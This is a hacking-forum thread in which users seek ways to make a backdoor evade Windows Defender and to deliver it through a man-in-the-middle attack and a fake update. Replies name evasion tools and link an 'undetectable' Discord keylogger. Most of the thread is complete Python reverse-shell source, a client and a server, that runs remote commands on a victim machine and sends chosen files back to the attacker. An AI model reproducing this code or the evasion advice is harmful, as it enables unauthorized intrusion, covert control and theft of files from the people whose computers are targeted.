Trying to generate an Undetectable Backdoor

hey guys! i’m trying to generate an undetectable backdoor with veil for windows computers using a MITM-Attack and inject it through a fake update but all my backdoors so far get detected by the default windows defender. i tried to use some services like nodistribute.com or antiscan.me to scan the file for known signatures in the databases of antiVir programms but those services are not working for me. they also dont include the default windows defender.

are there any services which work and include the signature database of windows defender?

peace

1 Like

I am not an expert on making undetected backdoors,but have you checked if windows defender also uses AI to detect backdoors?

The implementation of an AI would change the rules for sure but it doesnt seem that way. The services are up and running again. The database of windows defender is also included.

Join the club. Creating a backdoor in 2021 seems a lot more difficult than what we see and read for everything working back in mid 2010’s. its a whole new ballpark with AV detection and databases containing 1000’s of new signatures daily. I’m still trying as well. Fatrat no work. Unicorn. veil, unicorn, obfuscation other tools. seems AV’s know all these signatures

I’m new to this forum,but i would like to state the following:
When there’s a good method/tool…will get burned by kiddies using Virustotal and others.

Now that anti virus scanners respond quickly to every newly created backdoor, you need to be creative and go through the back door. Here’s an example of how discord is used to access someone else’s computer: GitHub - 3ct0s/discord-keylogger: Undetectable Keylogger that reports to Discord

here is a python backdoor

CLIENT:

from socket import *
import subprocess
import os

def connect():
    server = socket(AF_INET, SOCK_STREAM)
    # server ip
    host = "192.168.1.8"
    port = 111
    buffer_size = 1024
    print("[+] Connecting to {}:{}".format(host, port))
    server.connect((host, port))
    print("[+] Connected!")

    while 1:
        command = server.recv(1024)
        command_decoded = command.decode("utf-8")
        if "terminate" in command_decoded:
            print("[!] Connection closed!")
            server.close()
            break
        elif "steal" in command_decoded:
            file_path = command_decoded.split(">")
            print("[+] Start!")
            with open(file_path[1], "rb") as f:
                while True:
                    file_bytes = f.read(buffer_size)
                    if not file_bytes:
                        break
                    server.send(file_bytes)
            end = "end-transfer-file".encode("ISO-8859-1")
            server.send(end)
            print("[+] End!")
        else:
            CMD = subprocess.Popen(command_decoded, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            server.send(CMD.stdout.read())

def main():
    connect()

main()

SERVER:

from socket import *

PWD = input("Where do you want to save your files stealed? \nExample: /home/nonameon/Desktop/file\nPath: ")

def connect():
    # TCP connection
    sock = socket(AF_INET, SOCK_STREAM)
    host = "192.168.1.8"
    port = 11
    buffer_size = 1024
    sock.bind((host, port))
    sock.listen(1)

    while 1:
        print("[+] Listening {}:{}".format(host, port), end="")
        client, addr = sock.accept()
        print("\n[+] Connection from: ", addr)
        print("[?] Use 'steal><fila path>' for get file or 'terminate' for close connection")
        while 1:
            command = input("Shell> ")

            if "terminate" in command:
                client.send("terminate".encode())
                client.close()
                print("[+] Closed!")
                print("[+] Listening {}:{}".format(host, port), end="")
                break
            else:
                #manda
                client.send(command.encode())
                #riceve
                resp = client.recv(buffer_size)
                flag = True
                if "steal" in command:
                    file_backdoor = PWD
                    print("[+] Start!")
                    with open(file_backdoor, "wb") as f:
                        while True:
                            f.write(resp)
                            resp = client.recv(buffer_size)
                            if "end-transfer-file" in resp.decode("ISO-8859-1"):
                                break
                    print("[+] End!")
                else:
                    print(resp.decode("ISO-8859-1"))

def main():
    connect()
main()